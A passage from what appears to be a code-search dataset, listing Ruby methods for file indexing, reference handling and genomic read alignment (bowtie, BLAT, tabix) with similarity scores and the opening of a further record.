"def open_index(o={})\n @clf = cache_data('clf', Searcher.load_features())\n @con_weights = cache_data('con_weights', Searcher.load_weights(CON_FEATURES, 'con', Conf.weight_con))\n @doc_weights = cache_data('doc_weights', Searcher.load_weights(DOC_FEATURES, 'doc', Conf.weight_doc))\n end",
"def get_correct_filename(annotation, files, submission)\n if annotation.position == -1\n # position -1 maps to the Autograder Output\n \"Autograder Output\"\n elsif files && !annotation.position.nil?\n # if the submission is an archive, use filename in archive;\n # otherwise, use submission filename\n Archive.get_nth_filename(files, annotation.position)\n else\n submission.filename\n end\n end",
"def after_build\n cleanup_nontarget_files\n run_help_indexer\nend",
"def indexing?\n File.exist?(@indexing)\n end",
"def offset_for (ref)\n @xref[ref.id][ref.gen]\n rescue\n raise InvalidObjectError, \"Object #{ref.id}, Generation #{ref.gen} is invalid\"\n end",
"def load_index_in(source, words, remaining_words, priority)\n return unless @index_file_name\n index_source = source.relative_child(@index_file_name)\n load_relevant_path(index_source, words, remaining_words, priority) if index_source\n end",
"def fetchAnnotations(dataDir, outDir, trainingTriples)\n relations = Set.new(trainingTriples.map{|triple| triple[Constants::RELATION]})\n\n entities = []\n trainingTriples.each{|triple|\n entities << triple[Constants::HEAD]\n entities << triple[Constants::TAIL]\n }\n entities = Set.new(entities)\n\n annotations = ReverbLoad.annotations(File.join(dataDir, Reverb::ANNOTATIONS_FILE_RELPATH))\n testSet = []\n\n # TEST\n=begin\n annotations = []\n File.open('test2.txt', 'r'){|file|\n file.each{|line|\n parts = line.split(\"\\t\").map{|part| part.strip().downcase().gsub(' ', '_')}\n valid = parts.shift() == '1'\n parts.shift()\n\n parts[1], parts[2] = parts[2], parts[1]\n\n annotations << [\n parts,\n valid,\n 1.0\n ]\n }\n }\n=end\n\n # Go backwards.\n rejectedCount = 0\n (0...(annotations.size())).to_a().reverse().each{|i|\n annotation = annotations[i]\n\n if (!entities.include?(annotation[0][Constants::HEAD]))\n puts \"Rejecting annotation because head (#{annotation[0][Constants::HEAD]}) is not a known entity.\"\n annotations.delete_at(i)\n rejectedCount += 1\n next\n end\n\n if (!entities.include?(annotation[0][Constants::TAIL]))\n puts \"Rejecting annotation because tail (#{annotation[0][Constants::TAIL]}) is not a known entity.\"\n annotations.delete_at(i)\n rejectedCount += 1\n next\n end\n\n if (!entities.include?(annotation[0][Constants::RELATION]))\n puts \"Rejecting annotation because relation (#{annotation[0][Constants::RELATION]}) is not a known relaiton.\"\n annotations.delete_at(i)\n rejectedCount += 1\n next\n end\n }\n\n puts \"Rejected #{rejectedCount} / #{annotations.size() + rejectedCount} annotations for unknown components.\"\n\n # Write out the full annotations for reference.\n File.open(File.join(outDir, Reverb::ANNOTATIONS_RAW_FILENAME), 'w'){|file|\n file.puts(annotations.map{|annotation| annotation.flatten().join(\"\\t\")}.join(\"\\n\"))\n }\n\n # Remove negative examples.\n annotations.delete_if{|annotation| !annotation[1]}\n\n return annotations.map{|annotation| annotation[0]}\nend",
"def build_indices\n @files, @classes = RDoc::Generator::Context.build_indices(@toplevels,\n @options)\n end",
"def build_indices\n @files, @classes = RDoc::Generator::Context.build_indices(@toplevels,\n @options)\n end",
"def getReferencePath()\n inputParams = BWAParams.new()\n inputParams.loadFromFile()\n @referencePath = inputParams.getReferencePath()\n\n if isEmptyOrNull(@referencePath)\n @referencePath = \"none\"\n end\n end",
"def annotate_header header, fname\n genome = genome_from_fname fname\n\n \"#{genome}____#{header}\"\n end",
"def init_all_paths_liby\n\t\tcv_set(Liby, :path_lily_file \t => nil)\n\t\tcv_set(Liby, :path_pdf_file \t => nil)\n\t\tcv_set(Liby, :path_ruby_score => nil)\t\t\t\n\t\tcv_set(Liby, :path_affixe_file => nil)\t\t\t\n end",
"def dotindex(path)\n file = File.join(path, '.index')\n File.file?(file) ? file : false\n end",
"def add_result_distances_ref(base)\n pref = File.dirname(base)\n return nil unless\n File.exist?(\"#{pref}/01.haai/#{name}.db\")\n r = MiGA::Result.new(\"#{base}.json\")\n r.add_files(haai_db: \"01.haai/#{name}.db\", aai_db: \"02.aai/#{name}.db\",\n ani_db: \"03.ani/#{name}.db\")\n r\n end",
"def phrender_index_file(index_file_path = nil)\n @phrender_index_file = index_file_path || @phrender_index_file\n end",
"def locate_internal_refs\n #require 'debug'; binding.b\n refs = gather_internal_refs\n #@files.keys.reject { |k| @files[k][:attachment] }.each do |identifier|\n @files.keys.reject { |k| @files.get(k,:attachment) }.each do |identifier|\n #id = @c.decode(@isodoc.docid_prefix(\"\", identifier.dup))\n #locate_internal_refs1(refs, identifier, @files[id])\n id = @isodoc.docid_prefix(\"\", identifier.dup)\n locate_internal_refs1(refs, identifier, id)\n end\n refs.each do |schema, ids|\n ids.each do |id, key|\n key == true and refs[schema][id] = \"Missing:#{schema}:#{id}\"\n end\n end\n refs\n end",
"def generate_ref(ref, index)\n ref_name = Google::StringUtils.underscore(ref.name)\n generate_object(ref, \"resource(#{ref_name},#{index})\", :resource,\n index, ensure: 'present')\n end",
"def index\n if params[:annot_id] and params[:cat_i]\n @annot = Annot.where(:id => params[:annot_id]).first\n @cat_i = params[:cat_i]\n @annot_cell_set = AnnotCellSet.where(:annot_id => params[:annot_id], :cat_idx => params[:cat_i].to_i).first\n @cell_set = CellSet.where(:id => @annot_cell_set.cell_set_id).first\n @project = @annot.project\n @version = @project.version\n @h_env = Basic.safe_parse_json(@version.env_json, {})\n # @cell_set = CellSet.where(:id => @annot).first\n @all_clas = Cla.where(#:project_id => @project.id, \n :cell_set_id => @cell_set.id #@annot_cell_set.cell_set_id\n #:annot_id => params[:annot_id], :cat_idx => params[:cat_idx].to_i\n ).all\n @h_cla_sources = {}\n ClaSource.all.map{|e| @h_cla_sources[e.id] = e}\n \n @h_votes = {}\n if current_user\n my_votes = ClaVote.where(:cla_id => @all_clas.map{|c| c.id}, :user_id => current_user.id).all\n my_votes.each do |v|\n @h_votes[v.cla_id] = v\n end\n #votes.map{|v| h_votes[v.user_id] = v} \n #h_my_votes[my_vote.id] = my_vote \n end\n @h_cots = {}\n @h_genes = {}\n tmp_cot_ids = []\n tmp_down_gene_ids = []\n tmp_up_gene_ids = []\n @all_clas.each do |cla|\n tmp_cot_ids |= cla.cell_ontology_term_ids.split(\",\").map{|e| e.to_i} if cla.cell_ontology_term_ids\n tmp_up_gene_ids |= cla.up_gene_ids.split(\",\").map{|e| e.to_i} if cla.up_gene_ids\n tmp_down_gene_ids |= cla.down_gene_ids.split(\",\").map{|e| e.to_i} if cla.down_gene_ids\n end\n\n @h_all_cla_votes = {}\n \n all_votes = ClaVote.where(:cla_id => @all_clas.map{|e| e.id}).all.to_a\n \n all_votes.each do |vote|\n @h_all_cla_votes[vote.cla_id]||=[]\n @h_all_cla_votes[vote.cla_id].push vote\n end\n\n if tmp_cot_ids.size > 0\n CellOntologyTerm.where(:id => tmp_cot_ids).all.each do |cot|\n @h_cots[cot.id] = cot\n end\n end\n \n tmp_gene_ids = tmp_up_gene_ids | tmp_down_gene_ids\n if @h_env\n tmp_genes = Basic.sql_query2(:asap_data, @h_env['asap_data_db_version'], 'genes', '', 'id, name, ensembl_id', \"id IN (\" + tmp_gene_ids.join(\",\") + \")\")\n tmp_genes.each do |gene|\n @h_genes[gene.id.to_i] = gene\n end\n end\n \n render :partial => 'index'\n else\n @clas = Cla.all\n render\n end\n end",
"def add_result_distances_ref(base)\n pref = File.dirname(base)\n return nil unless File.exist?(\"#{pref}/01.haai/#{name}.db\")\n\n MiGA::Result.new(\"#{base}.json\").tap do |r|\n r.add_files(\n haai_db: \"01.haai/#{name}.db\",\n aai_db: \"02.aai/#{name}.db\",\n ani_db: \"03.ani/#{name}.db\"\n )\n end\n end",
"def add_result_distances_ref(base)\n pref = File.dirname(base)\n return nil unless File.exist?(\"#{pref}/01.haai/#{name}.db\")\n\n MiGA::Result.new(\"#{base}.json\").tap do |r|\n r.add_files(\n haai_db: \"01.haai/#{name}.db\",\n aai_db: \"02.aai/#{name}.db\",\n ani_db: \"03.ani/#{name}.db\"\n )\n end\n end",
"def generate_index\n setup\n\n template_file = @template_dir + 'index.rhtml'\n return unless template_file.exist?\n\n debug_msg \"Rendering the index page...\"\n\n out_file = @base_dir + @options.op_dir + 'index.html'\n rel_prefix = @outputdir.relative_path_from out_file.dirname\n search_index_rel_prefix = rel_prefix\n search_index_rel_prefix += @asset_rel_path if @file_output\n\n asset_rel_prefix = rel_prefix + @asset_rel_path\n\n @title = @options.title\n\n render_template template_file, out_file do |io|\n here = binding\n # suppress 1.9.3 warning\n here.local_variable_set(:asset_rel_prefix, asset_rel_prefix)\n here\n end\n rescue => e\n error = RDoc::Error.new \\\n \"error generating index.html: #{e.message} (#{e.class})\"\n error.set_backtrace e.backtrace\n\n raise error\n end",
"def should_index_this_document?(complete_path)\n last_itime=index_time_dbm_file[complete_path]\n @from_scratch || !last_itime || File.mtime(complete_path)> Time._load(last_itime) \n end",
"def genome_annotation\n self.genome_assembly.present? ? self.genome_assembly.current_annotation : nil\n end",
"def do_local_indexing(solr_doc); end",
"def construct_index\n end",
"def preindex!\n reset_trie!\n @board.flatten.each_with_index do |_, index|\n #convert flat index to x,y coords\n pos = index.divmod(4)\n build_trie(@trie, @board, pos)\n end\n @trie\n end",
"def reproc_true(file)\n full_path = file\n if (! File.exists?(full_path))\n # Rubymatica.save_status(dir_uuid, \"Can't reprocess, #{full_path} does not exist.\")\n print \"Can't reprocess, #{full_path} does not exist.\\n\";\n exit\n end\n extract_flag = false\n dir_uuid = File.basename(full_path)\n \n # When reprocessing, the meta_data/info.db already exists (or else\n # this will fail), therefore we can look in the db for info such\n # as the name of this ingest.\n \n my_ig = Ingest.new(dir_uuid)\n \n base_name = my_ig.read_meta(\"ingest_name\")\n tub = \"#{Dest}/#{dir_uuid}/#{Accession_dir}\"\n \n Rubymatica.save_status(dir_uuid, \"Reprocessing #{Accession_dir} uuid: #{dir_uuid}\")\n \n igl_dest = \"#{Dest}/#{dir_uuid}/#{Ig_logs}\"\n pv_dir = \"#{Dest}/#{dir_uuid}/#{Pv}\"\n md_dir = \"#{Dest}/#{dir_uuid}/#{Meta}\"\n ac_dir = \"#{Dest}/#{dir_uuid}/#{Accession_dir}\"\n \n # Delete any previously machine created files. Keeping files\n # would mean using previously created file uuid's and that\n # would be a mess. This codes doesn't have the architecture\n # for that.\n\n # Use an anonymous array because we can. Directories that we'll\n # clean up, followed by a list of files we will *not* delete.\n\n [igl_dest, pv_dir, md_dir].each { |path|\n Find.find(path) { |file|\n if (file.match(Dcx) or \n file.match(Db_name))\n next;\n end\n\n # Great line of code. OOP totally rocks. Not! Class,\n # method and variable all the same name, and you thought\n # programmers didn't have a sense of humor.\n \n if (File.file?(file))\n File.delete(file)\n end\n }\n }\n return base_name,dir_uuid, my_ig, tub, igl_dest, pv_dir, md_dir, ac_dir, extract_flag\n end",
"def check_index_finder\n # Leave it alone\n end",
"def input_paths\n reads_from_elasticsearch? ? elasticsearch_hdfs_tmp_dir(input_index) : super()\n end",
"def prune_index\n missing_files=index_time_dbm_file.reject{|filename,itime| File.exists?(filename) && Picolena::IndexedDirectories.any?{|dir,alias_path| filename.starts_with?(dir)}}\n missing_files.each{|filename, itime|\n index.writer.delete(:complete_path, filename)\n index_time_dbm_file.delete(filename)\n logger.debug \"Removed : #{filename}\"\n }\n index.optimize\n end",
"def index\n # Block if this file is currently being indexed by another thread/process\n if indexing?\n while indexing?\n sleep 1\n end\n else\n self.indexing = true\n \n begin\n # Filter unparseable entries\n # TODO: Find a more efficient way to filter unparseable entries without\n # having to copy the entire file line by line\n filtered = 0\n File.open(@filtered_file, 'w') do |f|\n File.foreach(@data_file) do |line|\n begin\n parse(line)\n f.write line\n rescue\n filtered += 0\n end\n end\n end\n puts \"Filtered #{filtered} unparseable entries\" if filtered > 0 and ENV['DEBUG']\n \n # File must be sorted\n File.sort(@filtered_file, @sorted_file, \"-k#{@chr_col},#{@chr_col} -k#{@start_col},#{@start_col}n\")\n \n # and BGZipped\n BGZip.compress(@sorted_file, @bgzipped_file)\n \n # Now Tabix can index it\n Tabix.index(@bgzipped_file, @chr_col, @start_col, @end_col)\n rescue\n raise EntryFileError, \"Error indexing file #{File.basename(@data_file)} for lookup!\"\n ensure\n # Delete the temporary filtered and sorted files since they are unneeded\n File.delete(@filtered_file) if File.exist?(@filtered_file)\n File.delete(@sorted_file) if File.exist?(@sorted_file)\n self.indexing = false\n end\n end\n end",
"def annotate_one_file(file_name, info_block, position, options = T.unsafe(nil)); end",
"def test_keyword_index_builder\n CEdictImporter.create_headword_index\n end",
"def locate_internal_refs1(refs, identifier, ident)\n #file, _filename = targetfile(filedesc, read: true)\n file, _filename = @files.targetfile_id(ident, read: true)\n xml = Nokogiri::XML(file) { |config| config.huge }\n t = xml.xpath(\"//*/@id\").each_with_object({}) { |i, x| x[i.text] = true }\n refs.each do |schema, ids|\n ids.keys.select { |id| t[id] }.each do |id|\n n = xml.at(\"//*[@id = '#{id}']\") and\n n.at(\"./ancestor-or-self::*[@type = '#{schema}']\") and\n refs[schema][id] = identifier\n end\n end\n end",
"def improve_rast_genbank(input_gbk, output_gbk, task_name=\"improve_rast\")\n abort \"FATAL: Task #{task_name} requires specifying STRAIN_NAME\" unless STRAIN_NAME \n unless GENBANK_REFERENCES\n puts \"WARN: No GenBank references for re-annotation provided, skipping this step\"\n cp input_gbk, output_gbk\n return\n end\n \n # Once we want to integrate antibiotic resistance databases, we can start adding those in here\n # as improve_rast_gbk.rb supports them\n system <<-SH\n module load blast/2.2.26+\n ruby #{REPO_DIR}/scripts/improve_rast_gbk.rb \\\n #{GENBANK_REFERENCES.map{|f| Shellwords.escape f }.join(' ')} #{Shellwords.escape input_gbk}\\\n > #{Shellwords.escape output_gbk}\n SH\n end",
"def create_index_file\n return [] unless File.exist? path\n\n RelatonBib.parse_yaml File.read(path, encoding: \"UTF-8\"), [Symbol]\n end",
"def load_script_from_index\n lines = File.readlines(index_filename)\n path = ENV['ALTERNATIVE_PATH'] || '.'\n lines.each do |filename|\n require(File.join(path, filename.chomp))\n end\n end",
"def transform index_file\n @config_hash = YAML.load(ERB.new(File.read(@config_yml)).result(binding))\n InputBatch::Log.write_log \"Opened csv file for processing\"\n InputBatch::Log.write_log \"Batch type to load : #{facility.batch_load_type.upcase}\"\n\n @index_file_name = File.basename(index_file).downcase\n load_flag = true\n @corresp_flag = true\n @version = facility.index_file_parser_type.downcase.include?('_bank') ? 'BANK_OF_AMERICA' : 'GENERAL'\n begin\n @csv = CSV.read(index_file, :col_sep => config_hash['COL_SEP'] )\n rescue\n raise \">>>>>>>> Invalid index file.....\"\n end\n @type = call_parser_specific_method \"find_type\"\n @image_folder = Dir.glob(\"#{@location}/**/#{config['IMAGE']['image_folder']}*\", File::FNM_CASEFOLD)\n unless @image_folder.blank?\n @image_path = @image_folder.first.split('/')[0..-2].join('/')\n\n raise \"Image Folder Mismatch : Please check for folder (case insensitive)\n '#{config['IMAGE']['image_folder']}' in batch zip \" if @image_folder.blank?\n\n @image_ext =File.extname(@image_folder[0]).delete(\".\")\n end\n InputBatch::Log.write_log \">>>>>Index Transformation Starts \" + Time.now.to_s\n @jobs = []\n header_row = config[\"HEADER_ROW\"]\n csv.shift(header_row) #skipping rows upto header\n unless csv.blank?\n raise \">>>> Error in date field. Dates should be unique for all the batches\" unless unique_date?\n\n if (@sitecode == '00Q49' && type == 'CORRESP' && csv[0][config['IMAGE']['image_file_name']].to_s.strip =~ /^\\d+$/) # DAP Correspondence logic\n @single_image_batch = true\n current_job_image = image_folder.detect{|file| File.extname(file) =~ /^.[t,T][i,I][f,F]$/ }\n dir_name = File.dirname(current_job_image)\n file_name = File.basename(current_job_image).split('.').first\n @page_count = %x[identify #{current_job_image}].split(File.basename(current_job_image)).length-1 rescue nil\n system(\"tiffsplit #{current_job_image} #{dir_name}/#{file_name}\")\n end\n csv.each_with_index do |row, index|\n @row_index = index + 1\n @row = row\n if !@row[0].blank?\n load_flag = eval(\"InputBatch.is_#{type.downcase}_process(facility)\") if job_condition\n if load_flag\n InputBatch::Log.status_log.info \"**** Processing index file row #{@row_index} ****\"\n save_records if valid_record?\n end\n end\n end\n @inbound_file_information.associate_to_report_check_informations if !@inbound_file_information.blank?\n end\n InputBatch::Log.write_log \">>>>>Index Transformation Ends \" + Time.now.to_s\n\n end",
"def pdf_location\n \"/pdf/#{authoritative_ref}.pdf\" if File.exists? \"public/pdf1/#{authoritative_ref}.pdf\"\n end",
"def build_cmd_ref\n # Example id's: N3K-C3048TP-1GE, N3K-C3064PQ-10GE, N7K-C7009, N7K-C7009\n\n debug \"Product: #{@product_id}\"\n debug \"Files being used: #{@files.join(', ')}\"\n\n @files.each do |file|\n feature = File.basename(file).split('.')[0]\n debug \"Processing file '#{file}' as feature '#{feature}'\"\n feature_hash = load_yaml(file)\n if feature_hash.empty?\n debug \"Feature #{feature} is empty\"\n next\n end\n feature_hash = filter_hash(feature_hash)\n if feature_hash.empty?\n debug \"Feature #{feature} is excluded\"\n @hash[feature] = UnsupportedCmdRef.new(feature, nil, file)\n next\n end\n\n base_hash = {}\n if feature_hash.key?('_template')\n base_hash = CommandReference.hash_merge(feature_hash['_template'])\n end\n\n feature_hash.each do |name, value|\n fail \"No entries under '#{name}' in '#{file}'\" if value.nil?\n @hash[feature] ||= {}\n if value.empty?\n @hash[feature][name] = UnsupportedCmdRef.new(feature, name, file)\n else\n values = CommandReference.hash_merge(value, base_hash.clone)\n @hash[feature][name] = CmdRef.new(feature, name, values, file)\n end\n end\n end\n end",
"def lttfindex\n end",
"def indexing=(b)\n if b\n FileUtils.touch(@indexing)\n else\n begin\n File.delete(@indexing) if File.exist?(@indexing)\n rescue\n puts \"Error deleting indexing file\" if ENV['DEBUG']\n end\n end\n end",
"def create_index_file_for_gist(filepath_array)\n filepath_array\n .map { |x| \"- #{x.split('/').last}\" }\n .sort\n .join(\"\\n\")\n end",
"def reindex!\n indexed if generate_solr_index\n end",
"def rebuild_index\n aaf_index.rebuild_index\n end",
"def initialize (filename)\n @indexname = filename + \".index\" \n @data_f = File.open(filename, \"w\")\n @index_f = File.open(@indexname, \"w\") \n @cur_num = 0 \n @cur_pos = @data_f.pos # 0\n end",
"def refresh\n super do |modified|\n return unless modified\n @indexer.generate_index #TODO: update_index?\n end\n end",
"def load_index\n construct_index unless index_valid?\n open_index_file\n end",
"def index_one(book_name)\n\n file = File.open( @dir_path+book_name, \"r\")\n\n puts \"Indexing #{book_name}\"\n file.each_line do |line|\n words = line.split\n words.each do |word|\n word = word.gsub(/[;.\"\"...,()?!*]+/i, \"\").downcase\n @connection.query(\"INSERT INTO #{@table_name} (word, count) VALUES ('#{@connection.escape(word)}', 1) ON DUPLICATE KEY UPDATE count=count+1\")\n\n end\n end\n\n puts \"Indexed #{book_name}\"\n end",
"def _lex_index_offsets; end",
"def _lex_index_offsets; end",
"def _lex_index_offsets; end",
"def _lex_index_offsets; end",
"def pathSourceDoc\n\t\"./documentation/\"\nend",
"def update_index\n index_files = []\n index_files << upload(\"specs.4.8.gz\", specs_index)\n log \"Uploaded all specs index\"\n index_files << upload(\"latest_specs.4.8.gz\", latest_index)\n log \"Uploaded latest specs index\"\n index_files << upload(\"prerelease_specs.4.8.gz\", prerelease_index)\n log \"Uploaded prerelease specs index\"\n\n index_files.each do |file|\n tuf_repo.replace_file(file, 'targets/unclaimed', 'targets')\n end\n\n # For now assume all files are unclaimed\n pending_files = tuf_pending_store.pending\n pending_files.each do |file|\n puts \"Adding file: #{file.path}\"\n tuf_repo.add_file(file, 'targets/unclaimed', 'targets')\n end\n tuf_repo.publish!\n tuf_pending_store.clear(pending_files)\n end",
"def full_ref # rubocop:disable Metrics/AbcSize\n @full_ref ||= begin\n ref = \"#{refparts[:perfix]}#{refparts[:series]} #{refparts[:code]}\"\n ref += \"pt#{refparts[:prt]}\" if refparts[:prt] # long_to_short(refparts, \"prt\").to_s\n ref += \"ver#{refparts[:ver]}\" if refparts[:ver] # long_to_short(refparts, \"vol\").to_s\n ref += \"v#{refparts[:vol]}\" if refparts[:vol]\n ref\n end\n end",
"def autoindex(loc, switch = 'on')\n oputs <<-eos\n location #{loc} {\n autoindex #{switch};\n }\n eos\nend",
"def buildParentReadMeIndex\n x = 0\n fileOutArr = Array.new\n\n # Build list of reference pages\n fileOutArr.push \"### Fn Command Reference\\n\\n\"\n @cmdListArr.each do |command|\n # Add each command to output\n fileOutArr.push \"[\" + command + \"](ref/\" + @fileNameArr[x] + \".md\" + \") \\n\"\n x = x + 1 # Counter for syncing arrays\n end\n \n # Add Fn Version\n fileOutArr.push(\"\\n<sub>\" + @fnVersion + \"</sub>\")\n\n\n # Write REFLIST.md file to disk\n puts \"Writing: \" + \"REFLIST\" + \".md\"\n File.open(\"REFLIST.md\", \"w\") do |f|\n f.puts(fileOutArr)\n end\n\n end"
] |
[
"0.55707574",
"0.5537845",
"0.52282965",
"0.5211746",
"0.514618",
"0.5114455",
"0.50818527",
"0.5056654",
"0.504273",
"0.50184566",
"0.50184566",
"0.49482235",
"0.4944961",
"0.49263582",
"0.48924422",
"0.48880744",
"0.48818028",
"0.48589686",
"0.48510918",
"0.48327085",
"0.476794",
"0.4767461",
"0.47097993",
"0.47094783",
"0.47056365",
"0.4700083",
"0.46883032",
"0.46786386",
"0.46696615",
"0.46692318",
"0.466867",
"0.4667478",
"0.46673572",
"0.4657162",
"0.46505302",
"0.4650467",
"0.46366543",
"0.46175605",
"0.46168017",
"0.46162638",
"0.4606074",
"0.45994556",
"0.45965457",
"0.45950547",
"0.45877334",
"0.45870924",
"0.45635754",
"0.4559753",
"0.45565984",
"0.4554373",
"0.4554373",
"0.45506942",
"0.4550126",
"0.4538813",
"0.45317072",
"0.4519073",
"0.45189765",
"0.4518386",
"0.45147488",
"0.4509108",
"0.44951054",
"0.44951054",
"0.44915035",
"0.449025",
"0.44901064",
"0.44829196",
"0.44805562",
"0.44772267",
"0.44750908",
"0.44704145",
"0.44628236",
"0.4456697",
"0.44562846",
"0.4454698",
"0.44521835",
"0.44453028",
"0.4440797",
"0.4437238",
"0.443604",
"0.4429437",
"0.4425258",
"0.4424632",
"0.4422372",
"0.4418305",
"0.441819",
"0.44133627",
"0.4413159",
"0.4410262",
"0.4408414",
"0.44044337",
"0.4402443",
"0.43950605",
"0.43950605",
"0.43950605",
"0.43950605",
"0.43935505",
"0.43927315",
"0.43913174",
"0.43848562",
"0.43831405"
] |
0.6362013
|
0
|
Performs alignment ref path to genomic reference ref_base path to reference without file extension software alignment software (bowtie1, bowtie2, bwa, star, tophat) opts stepspecific options :annotation path to genomic annotation :mismatches max num of mismatches in alignment :seedlen seed length for ncRNA alignment :tophat_aligner software that tophat uses (bowtiet1 / 2) Returns name of files containing mapped and unmapped reads
|
def align(ref, ref_base, software, opts = {})
if software == :tophat
bt_flag =
opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''
gap_flag =
opts[:mismatches] < 2 ? "--read-gap-length #{opts[:mismatches]}" : ''
end
aln_cmd = {
bowtie1:
'bowtie' \
" --seedlen=#{opts[:seedlen]} #{ref_base}" \
" --un=#{@names.get('fp')}" \
" -q #{@names.get('trim')} " \
" --sam #{@names.get('ncrna')}",
bowtie2:
'bowtie2' \
" --un #{@names.get('fp')}" \
" -x #{ref_base}" \
" -L #{opts[:seedlen]}" \
" -U #{@names.get('trim')}" \
" -S #{@names.get('ncrna')}",
bwa:
'bwa mem' \
" -k #{opts[:seedlen]}" \
" #{ref} " \
" #{@names.get('trim')} " \
"| samtools view -b - > #{@names.get('ncrna')} " \
'&& bam2fastq' \
" -o #{@names.get('fp')}" \
" --no-aligned #{@names.get('ncrna')}",
tophat:
'tophat' \
" --read-edit-dist #{opts[:mismatches]}" \
" #{bt_flag}" \
" -N #{opts[:mismatches]}" \
" --output-dir #{@names.get('topout')}" \
' --no-novel-juncs' \
" #{gap_flag}" \
" --GTF #{opts[:annotation]}" \
" #{ref_base} #{@names.get('fp')}",
star:
'STAR' \
" --genomeDir #{ref_base}" \
" --outFilterMismatchNmax #{opts[:mismatches]}" \
" --readFilesIn #{@names.get('fp')}"\
" --outFileNamePrefix #{@names.get('mapped_all')}"
}
target =
opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')
run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')
[@names.get('mapped_all'), @names.get('unmapped')]
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def unbucketized_alignment\n align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: @mismatches\n }\n )\n mapped_all = @software == :star ? \\\n @names.get('mapped_all_star') : @names.get('mapped_all')\n run_cmd(\"cp #{mapped_all} #{@names.get('mapped_merged')}\")\n unless @software == :star\n run_cmd(\n \"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}\"\n )\n end\n @max_mismatches = @mismatches\n end",
"def process_alignment\n # init vars\n @names = []\n @seqs = []\n \n @alignment = \"-B #{@basename}.aln\"\n\n # import alignment file\n @content = IO.readlines(@infile).map {|line| line.chomp}\n \n #check alignment for gap-only columns\n remove_inserts\n \n #write query-file\n File.open(@infile, \"w\") do |file|\n file.write(\">#{@names[0]}\\n\")\n file.write(\"#{@seqs[0]}\\n\")\n end\n \n #write aln-file\n File.open(@basename + \".aln\", \"w\") do |file|\n @names.each_index do |num|\n file.write(\"Sequence#{num} \")\n file.write(\" \") if (num < 10)\n file.write(\" \") if (num < 100)\n file.write(\"#{@seqs[num]}\\n\")\n end\n end\n end",
"def align_compressed_reads_to_human_genome_reference_using_bowtie\n\t\tputs \"step 7 align compressed reads to human genome reference using bowtie\"\n\t\tfiles.each_pair do |k,v|\n\t\t\t#\tbowtie's verbose is RIDICULOUS!\n\t\t\t#\tIt prints WAY too much and adds WAY too much time.\n\t\t\t#\t\t\t\t\"--verbose \"<<\n\t\t\tcommand = \"bowtie -n #{bowtie_mismatch} -p #{bowtie_threads} -f \" <<\n\t\t\t\t\"-S #{bowtie_index_human} compress_#{k}lane.fa compress_#{k}lane.sam\"\n\t\t\tcommand.execute\n\t\t\t\"compress_#{k}lane.sam\".file_check(die_on_failed_file_check) #\tthe reads that DIDN'T align?\tNO\n\n\t\t\t\"sam2names.rb compress_#{k}lane.sam bowtie_#{k}lane.names\".execute\n\t\t\t\"bowtie_#{k}lane.names\".file_check(die_on_failed_file_check)\n\t\tend\n\n\t\tpull_reads_from_fastas(\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.names\" },\n\t\t\tfiles.keys.sort.collect{|k| \"compress_#{k}lane.fa\" },\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.fa\" })\n\n#\n#\tThis script has fixed input of chopped_leftlane.psl (and right or single)\n#\tBAD. BAD. BAD.\tTODO\n#\tThis is only informative and nothing uses the output\n#\tso could be commented out.\n#\n#\n#\tTODO Replaced with ruby version, but still in development\n#\n#\n#\t\tcommand = \"candidate_non_human.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"bowtie_#{k}lane.names \" }\n#\t\tcommand.execute\n#\t\tfile_check( \"candidate_non_human.txt\" )\n\tend",
"def find_blat_out_candidate_reads\n\t\tputs \"step 4 find blat out candidate reads\"\n\t\tblat_out_candidate_reads(\n\t\t\tfiles.keys.sort.collect{|k| \"chopped_#{k}lane.psl \" },\n\t\t\tfiles.keys.sort.collect{|k| \"#{k}lane.fa \" },\n\t\t\tfiles.keys.sort.collect{|k| \"04_blat_out_candidate_#{k}lane.fa\" })\n\n#\t\tcommand = \"blatoutcandidate.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"chopped_#{k}lane.psl \" } #\tNON-HUMAN matches\n#\t\tfiles.keys.sort.each{|k| command << \"#{k}lane.fa \" } #\traw reads input\n#\t\tcommand.execute\n##\n##\tblatoutcandidate.pl ALWAYS creates ... blat_out_candidate_#{k}lane.fa\n##\tI REALLY don't like that. So much inconsistancy. Will overwrite existing.\n##\n##\tTODO wrote my own version of blatoutcandidate so could change this\n##\n#\t\tfiles.each_pair { |k,v| \n#\t\t\t#\t\n#\t\t\t#\traw reads with names in the psl files.\n#\t\t\t#\t\n#\t\t\t\"blat_out_candidate_#{k}lane.fa\".file_check(die_on_failed_file_check)\n#\t\t\tFileUtils.mv( \"blat_out_candidate_#{k}lane.fa\",\n#\t\t\t\t\"04_blat_out_candidate_#{k}lane.fa\" )\t#\tNON-HUMAN matches \n#\t\t}\n\tend",
"def generate_alignment\n raise ArgumentError, 'Missing genome FASTA file.' unless @genome_file\n raise ArgumentError, 'Missing transcripts FASTA file.' unless @transcripts_file\n \n # Prepare the BLAT alignment\n blat = Alignment::BLAT.new(@blat_options.merge({ out_format: :tab, database: @genome_file }))\n \n # Optionally set a permanent file to write the results to\n @alignment_file ||= \"#{@transcripts_file}.alignment\"\n blat.output_file = @alignment_file\n \n puts \"Running BLAT alignment...\" if @verbose\n \n # Run\n result_file = blat.run(@transcripts_file)\n result_file.path\n end",
